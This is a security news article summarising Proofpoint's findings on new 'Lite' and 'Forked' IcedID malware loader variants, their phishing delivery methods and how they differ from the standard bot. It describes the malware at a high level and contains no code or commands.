Malware

New IcedID variants have been found without the usual online banking fraud functionality and instead focus on installing further malware on compromised systems.

According to Proofpoint, these new variants have been seen used by three distinct threat actors in seven campaigns since late last year, focusing on further payload delivery, most notably ransomware.

Proofpoint has identified two new variants of the IcedID loader, namely “Lite” (first seen in November 2022) and “Forked” (first observed in February 2023), both delivering the same IcedID bot with a more narrow-focused feature set.

Removing unneeded functions on IcedID, which has been deployed in numerous malicious campaigns without many code changes since 2017, makes it stealthier and leaner, which can help the threat actors evade detection.

Separate clusters of IcedID activity
Separate clusters of IcedID activity (Proofpoint)

New IcedID campaigns

Starting in November 2022, the “Lite” variant of the IcedID loader was delivered as a second-stage payload on systems infected by the newly-returned Emotet malware.

The “Forked” version of the malware loader first appeared in February 2023, distributed directly through thousands of personalized invoice-themed phishing emails.

These messages used Microsoft OneNote attachments (.one) to execute a malicious HTA file that, in turn, runs a PowerShell command which fetches IcedID from a remote resource. At the same time, the victim is served a decoy PDF.

Malicious OneNote attachment used in recent campaign
Malicious OneNote attachment used in recent campaign (Proofpoint)

At the end of February, Proofpoint’s researchers observed a low-volume campaign distributing IcedID “Forked” via fake notices from the National Traffic and Motor Vehicle Safety Act and the U.S. Food and Drug Administration (FDA).

It is important to note that while some threat actors use new variants of the IcedID malware, others still choose to deploy the “Standard” variant, with one of the most recent campaigns dating March 10, 2023.

The new variants

The “Forked” IcedID loader is quite similar to the “Standard” version in terms of its role, sending basic host info to the C2 and then fetching the IcedID bot. 

However, “Forked” uses a different file type (COM Server) and features additional domain and string-decryption code, making the payload 12KB larger than the “Standard” version.

Domain decryption
Domains decryption (Proofpoint)

On the other hand, the “Lite” loader variant is lighter, at 20KB, and does not exfiltrate host info to the C2. This change makes sense since it was deployed alongside Emotet, which had already profiled the breached system.

The “Forked” version of the IcedID bot is 64KB smaller than the “Standard” bot, and is basically the same malware minus the web injects system, the AiTM (adversary in the middle) functions, and the backconnect capabilities that give threat actors remote access to infected devices.

Standard and Forked bot comparison
Standard and Forked bot comparison (Proofpoint)

IcedID is generally used for initial access by threat actors, so developing new variants is a worrying sign, signifying a shift towards specializing the bot to payload delivery.

Proofpoint predicts that most threat actors will continue to use the “Standard” variant, but the deployment of new IcedID versions will likely grow, and more variants may pop up later in 2023.

Related Articles:

Police seize over 100 malware loader servers, arrest four cybercriminals

New Unfurling Hemlock threat actor floods systems with malware

Warmcookie Windows backdoor pushed via fake job offers

Banking malware Grandoreiro returns after police disruption

Millions of Docker repos found pushing malware, phishing sites